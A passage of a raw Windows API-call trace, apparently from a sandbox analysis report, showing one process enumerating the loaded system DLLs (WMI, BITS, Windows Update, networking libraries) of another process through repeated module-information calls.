lpmodinfo=0x249c138*(lpBaseOfDll=0x7fef9bc0000, SizeOfImage=0xd3000, EntryPoint=0x7fef9c38b00)) returned 1 [0045.334] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9bc0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="FastProx.dll") returned 0xc [0045.339] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9bc0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\FastProx.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")) returned 0x25 [0045.345] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9b90000, lpmodinfo=0x249e310, cb=0x18 | out: lpmodinfo=0x249e310*(lpBaseOfDll=0x7fef9b90000, SizeOfImage=0x27000, EntryPoint=0x7fef9b911a0)) returned 1 [0045.350] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9b90000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="NTDSAPI.dll") returned 0xb [0045.356] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9b90000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NTDSAPI.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")) returned 0x1f [0045.362] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef98a0000, lpmodinfo=0x24a04d0, cb=0x18 | out: lpmodinfo=0x24a04d0*(lpBaseOfDll=0x7fef98a0000, SizeOfImage=0x13000, EntryPoint=0x7fef98a1d80)) returned 1 [0045.367] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef98a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wbemsvc.dll") returned 0xb [0045.376] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef98a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")) returned 0x24 [0045.383] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9830000, lpmodinfo=0x24a26a0, cb=0x18 | out: lpmodinfo=0x24a26a0*(lpBaseOfDll=0x7fef9830000, SizeOfImage=0x6b000, EntryPoint=0x7fef9874344)) returned 1 [0045.390] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="hnetcfg.dll") returned 0xb [0045.397] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll")) returned 0x1f [0045.404] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9b80000, lpmodinfo=0x24a4860, cb=0x18 | out: lpmodinfo=0x24a4860*(lpBaseOfDll=0x7fef9b80000, SizeOfImage=0xe000, EntryPoint=0x7fef9b85500)) returned 1 [0045.410] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9b80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wbemprox.dll") returned 0xc [0045.417] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9b80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")) returned 0x25 [0045.429] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefce90000, lpmodinfo=0x24a6a38, cb=0x18 | out: lpmodinfo=0x24a6a38*(lpBaseOfDll=0x7fefce90000, SizeOfImage=0x5b000, EntryPoint=0x7fefce96940)) returned 1 [0045.436] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefce90000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0045.444] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefce90000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DNSAPI.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0045.453] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef97b0000, lpmodinfo=0x24a8bf8, cb=0x18 | out: lpmodinfo=0x24a8bf8*(lpBaseOfDll=0x7fef97b0000, SizeOfImage=0x74000, EntryPoint=0x7fef97b66f0)) returned 1 [0045.468] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef97b0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="netprofm.dll") returned 0xc [0045.483] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef97b0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")) returned 0x20 [0045.489] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9780000, lpmodinfo=0x24aadc8, cb=0x18 | out: lpmodinfo=0x24aadc8*(lpBaseOfDll=0x7fef9780000, SizeOfImage=0x21000, EntryPoint=0x7fef97903b0)) returned 1 [0045.495] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9780000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wmiutils.dll") returned 0xc [0045.501] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9780000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")) returned 0x25 [0045.507] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9720000, lpmodinfo=0x24acfa0, cb=0x18 | out: lpmodinfo=0x24acfa0*(lpBaseOfDll=0x7fef9720000, SizeOfImage=0x5a000, EntryPoint=0x7fef975dde0)) returned 1 [0045.513] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9720000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="repdrvfs.dll") returned 0xc [0045.519] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9720000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll")) returned 0x25 [0045.529] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9710000, lpmodinfo=0x24af178, cb=0x18 | out: lpmodinfo=0x24af178*(lpBaseOfDll=0x7fef9710000, SizeOfImage=0x8000, EntryPoint=0x7fef9711020)) returned 1 [0045.536] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9710000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SSCORE.DLL") returned 0xa [0045.544] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9710000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SSCORE.DLL" (normalized: "c:\\windows\\system32\\sscore.dll")) returned 0x1e [0045.549] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef96c0000, lpmodinfo=0x24b1350, cb=0x18 | out: lpmodinfo=0x24b1350*(lpBaseOfDll=0x7fef96c0000, SizeOfImage=0x50000, EntryPoint=0x7fef96c1190)) returned 1 [0045.556] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef96c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CLUSAPI.DLL") returned 0xb [0045.562] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef96c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLUSAPI.DLL" (normalized: "c:\\windows\\system32\\clusapi.dll")) returned 0x1f [0045.568] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd310000, lpmodinfo=0x24b3510, cb=0x18 | out: lpmodinfo=0x24b3510*(lpBaseOfDll=0x7fefd310000, SizeOfImage=0x14000, EntryPoint=0x7fefd314160)) returned 1 [0045.575] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd310000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="cryptdll.dll") returned 0xc [0045.580] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd310000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll")) returned 0x20 [0045.587] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef96a0000, lpmodinfo=0x24b56e0, cb=0x18 | out: lpmodinfo=0x24b56e0*(lpBaseOfDll=0x7fef96a0000, SizeOfImage=0x19000, EntryPoint=0x7fef96a1104)) returned 1 [0045.593] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef96a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="RESUTILS.DLL") returned 0xc [0045.599] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef96a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RESUTILS.DLL" (normalized: "c:\\windows\\system32\\resutils.dll")) returned 0x20 [0045.605] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef95e0000, lpmodinfo=0x24b78b0, cb=0x18 | out: lpmodinfo=0x24b78b0*(lpBaseOfDll=0x7fef95e0000, SizeOfImage=0xb5000, EntryPoint=0x7fef965cf80)) returned 1 [0045.611] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef95e0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wmiprvsd.dll") returned 0xc [0045.617] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef95e0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wmiprvsd.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll")) returned 0x25 [0045.623] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef95c0000, lpmodinfo=0x24b9a88, cb=0x18 | out: lpmodinfo=0x24b9a88*(lpBaseOfDll=0x7fef95c0000, SizeOfImage=0x12000, EntryPoint=0x7fef95c89d0)) returned 1 [0045.630] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef95c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="NCObjAPI.DLL") returned 0xc [0045.636] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef95c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NCObjAPI.DLL" (normalized: "c:\\windows\\system32\\ncobjapi.dll")) returned 0x20 [0045.642] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9540000, lpmodinfo=0x24bbc58, cb=0x18 | out: lpmodinfo=0x24bbc58*(lpBaseOfDll=0x7fef9540000, SizeOfImage=0x71000, EntryPoint=0x7fef95851d0)) returned 1 [0045.650] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9540000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wbemess.dll") returned 0xb [0045.655] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9540000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll")) returned 0x24 [0045.661] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac20000, lpmodinfo=0x24bde28, cb=0x18 | out: lpmodinfo=0x24bde28*(lpBaseOfDll=0x7fefac20000, SizeOfImage=0x11000, EntryPoint=0x7fefac216ac)) returned 1 [0045.667] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac20000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0045.673] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac20000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")) returned 0x21 [0045.681] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac00000, lpmodinfo=0x24bfff8, cb=0x18 | out: lpmodinfo=0x24bfff8*(lpBaseOfDll=0x7fefac00000, SizeOfImage=0x18000, EntryPoint=0x7fefac01bf8)) returned 1 [0045.700] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac00000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0045.707] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac00000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")) returned 0x20 [0045.719] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9530000, lpmodinfo=0x24c21c8, cb=0x18 | out: lpmodinfo=0x24c21c8*(lpBaseOfDll=0x7fef9530000, SizeOfImage=0x8000, EntryPoint=0x7fef9531414)) returned 1 [0045.725] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9530000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="rasadhlp.dll") returned 0xc [0045.732] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9530000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")) returned 0x20 [0045.738] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa5d0000, lpmodinfo=0x24c4398, cb=0x18 | out: lpmodinfo=0x24c4398*(lpBaseOfDll=0x7fefa5d0000, SizeOfImage=0xc000, EntryPoint=0x7fefa5d602c)) returned 1 [0045.744] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa5d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="npmproxy.dll") returned 0xc [0045.751] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa5d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")) returned 0x20 [0045.757] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef7600000, lpmodinfo=0x24c6568, cb=0x18 | out: lpmodinfo=0x24c6568*(lpBaseOfDll=0x7fef7600000, SizeOfImage=0xee000, EntryPoint=0x7fef76012a0)) returned 1 [0045.764] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef7600000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="actxprxy.dll") returned 0xc [0045.770] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef7600000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")) returned 0x20 [0045.777] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb60000, lpmodinfo=0x24c8738, cb=0x18 | out: lpmodinfo=0x24c8738*(lpBaseOfDll=0x7fefcb60000, SizeOfImage=0x1f000, EntryPoint=0x7fefcb65c68)) returned 1 [0045.783] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb60000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SPINF.dll") returned 0x9 [0045.790] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb60000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SPINF.dll" (normalized: "c:\\windows\\system32\\spinf.dll")) returned 0x1d [0045.796] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb6f0000, lpmodinfo=0x24ca8f8, cb=0x18 | out: lpmodinfo=0x24ca8f8*(lpBaseOfDll=0x7fefb6f0000, SizeOfImage=0x17000, EntryPoint=0x7fefb6f9d50)) returned 1 [0045.803] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb6f0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ncprov.dll") returned 0xa [0045.809] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb6f0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\ncprov.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll")) returned 0x23 [0045.816] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9520000, lpmodinfo=0x24ccac0, cb=0x18 | out: lpmodinfo=0x24ccac0*(lpBaseOfDll=0x7fef9520000, SizeOfImage=0xf000, EntryPoint=0x7fef9526894)) returned 1 [0045.823] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9520000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ndiscapCfg.dll") returned 0xe [0045.829] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9520000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll")) returned 0x22 [0045.835] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9500000, lpmodinfo=0x24cec90, cb=0x18 | out: lpmodinfo=0x24cec90*(lpBaseOfDll=0x7fef9500000, SizeOfImage=0x1a000, EntryPoint=0x7fef9511ae4)) returned 1 [0045.842] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9500000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="rascfg.dll") returned 0xa [0045.848] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9500000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll")) returned 0x1e [0045.855] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6590000, lpmodinfo=0x24d0e50, cb=0x18 | out: lpmodinfo=0x24d0e50*(lpBaseOfDll=0x7fef6590000, SizeOfImage=0x3a000, EntryPoint=0x7fef6591010)) returned 1 [0045.861] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6590000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="MPRAPI.dll") returned 0xa [0045.868] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6590000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MPRAPI.dll" (normalized: "c:\\windows\\system32\\mprapi.dll")) returned 0x1e [0045.875] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6e60000, lpmodinfo=0x24d3010, cb=0x18 | out: lpmodinfo=0x24d3010*(lpBaseOfDll=0x7fef6e60000, SizeOfImage=0x42000, EntryPoint=0x7fef6e90048)) returned 1 [0045.881] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6e60000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="tcpipcfg.dll") returned 0xc [0045.889] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6e60000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll")) returned 0x20 [0045.896] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6520000, lpmodinfo=0x24d51e0, cb=0x18 | out: lpmodinfo=0x24d51e0*(lpBaseOfDll=0x7fef6520000, SizeOfImage=0x62000, EntryPoint=0x7fef6521198)) returned 1 [0045.902] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6520000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="RasApi32.dll") returned 0xc [0045.909] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6520000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RasApi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll")) returned 0x20 [0045.916] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6500000, lpmodinfo=0x24d7be0, cb=0x18 | out: lpmodinfo=0x24d7be0*(lpBaseOfDll=0x7fef6500000, SizeOfImage=0x1c000, EntryPoint=0x7fef65011a0)) returned 1 [0045.922] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6500000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="rasman.dll") returned 0xa [0045.929] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6500000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll")) returned 0x1e [0045.936] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef42f0000, lpmodinfo=0x24d9da0, cb=0x18 | out: lpmodinfo=0x24d9da0*(lpBaseOfDll=0x7fef42f0000, SizeOfImage=0xd2000, EntryPoint=0x7fef4381a10)) returned 1 [0045.943] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef42f0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="qmgr.dll") returned 0x8 [0045.950] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef42f0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll")) returned 0x1c [0045.956] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef42e0000, lpmodinfo=0x24dbf60, cb=0x18 | out: lpmodinfo=0x24dbf60*(lpBaseOfDll=0x7fef42e0000, SizeOfImage=0xa000, EntryPoint=0x7fef42e3994)) returned 1 [0045.963] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef42e0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="bitsperf.dll") returned 0xc [0045.970] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef42e0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll")) returned 0x20 [0045.982] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef4250000, lpmodinfo=0x24de130, cb=0x18 | out: lpmodinfo=0x24de130*(lpBaseOfDll=0x7fef4250000, SizeOfImage=0x12000, EntryPoint=0x7fef42590bc)) returned 1 [0045.989] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef4250000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="bitsigd.dll") returned 0xb [0045.996] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef4250000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll")) returned 0x1f [0046.002] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef4200000, lpmodinfo=0x24e02f0, cb=0x18 | out: lpmodinfo=0x24e02f0*(lpBaseOfDll=0x7fef4200000, SizeOfImage=0x45000, EntryPoint=0x7fef4233644)) returned 1 [0046.010] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef4200000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="upnp.dll") returned 0x8 [0046.017] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef4200000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll")) returned 0x1c [0046.023] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa240000, lpmodinfo=0x24e24b0, cb=0x18 | out: lpmodinfo=0x24e24b0*(lpBaseOfDll=0x7fefa240000, SizeOfImage=0x71000, EntryPoint=0x7fefa241010)) returned 1 [0046.031] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa240000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WINHTTP.dll") returned 0xb [0046.038] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa240000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINHTTP.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")) returned 0x1f [0046.045] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa1d0000, lpmodinfo=0x24e4670, cb=0x18 | out: lpmodinfo=0x24e4670*(lpBaseOfDll=0x7fefa1d0000, SizeOfImage=0x64000, EntryPoint=0x7fefa1d1254)) returned 1 [0046.052] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa1d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="webio.dll") returned 0x9 [0046.059] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa1d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")) returned 0x1d [0046.065] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa190000, lpmodinfo=0x24e6830, cb=0x18 | out: lpmodinfo=0x24e6830*(lpBaseOfDll=0x7fefa190000, SizeOfImage=0x11000, EntryPoint=0x7fefa199e7c)) returned 1 [0046.073] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa190000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SSDPAPI.dll") returned 0xb [0046.080] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa190000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SSDPAPI.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll")) returned 0x1f [0046.087] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef32d0000, lpmodinfo=0x24e89f0, cb=0x18 | out: lpmodinfo=0x24e89f0*(lpBaseOfDll=0x7fef32d0000, SizeOfImage=0x253000, EntryPoint=0x7fef32d236c)) returned 1 [0046.094] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef32d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wuaueng.dll") returned 0xb [0046.100] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef32d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll")) returned 0x1f [0046.108] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef4e80000, lpmodinfo=0x24eabb0, cb=0x18 | out: lpmodinfo=0x24eabb0*(lpBaseOfDll=0x7fef4e80000, SizeOfImage=0x27a000, EntryPoint=0x7fef4eb2200)) returned 1 [0046.116] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef4e80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ESENT.dll") returned 0x9 [0046.124] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef4e80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\ESENT.dll" (normalized: "c:\\windows\\system32\\esent.dll")) returned 0x1d [0046.131] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb890000, lpmodinfo=0x24ecd70, cb=0x18 | out: lpmodinfo=0x24ecd70*(lpBaseOfDll=0x7fefb890000, SizeOfImage=0x71000, EntryPoint=0x7fefb8cecc4)) returned 1 [0046.138] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb890000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WINSPOOL.DRV") returned 0xc [0046.145] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb890000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\WINSPOOL.DRV" (normalized: "c:\\windows\\system32\\winspool.drv")) returned 0x20 [0046.153] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3530000, lpmodinfo=0x24eef40, cb=0x18 | out: lpmodinfo=0x24eef40*(lpBaseOfDll=0x7fef3530000, SizeOfImage=0x1b000, EntryPoint=0x7fef3531198)) returned 1 [0046.164] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3530000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="Cabinet.dll") returned 0xb [0046.171] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3530000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\Cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll")) returned 0x1f [0046.178] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef32c0000, lpmodinfo=0x24f1100, cb=0x18 | out: lpmodinfo=0x24f1100*(lpBaseOfDll=0x7fef32c0000, SizeOfImage=0xf000, EntryPoint=0x7fef32c9a48)) returned 1 [0046.186] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef32c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="mspatcha.dll") returned 0xc [0046.194] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef32c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll")) returned 0x20 [0046.202] GetModuleInformation (in: hProcess=0x218, hModule=0x779f0000, lpmodinfo=0x24f32e8, cb=0x18 | out: lpmodinfo=0x24f32e8*(lpBaseOfDll=0x779f0000, SizeOfImage=0x7000, EntryPoint=0x779f106c)) returned 1 [0046.210] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x779f0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0046.217] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x779f0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")) returned 0x1d [0046.224] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd1c0000, lpmodinfo=0x24f54a8, cb=0x18 | out: lpmodinfo=0x24f54a8*(lpBaseOfDll=0x7fefd1c0000, SizeOfImage=0x8000, EntryPoint=0x7fefd1c2a6c)) returned 1 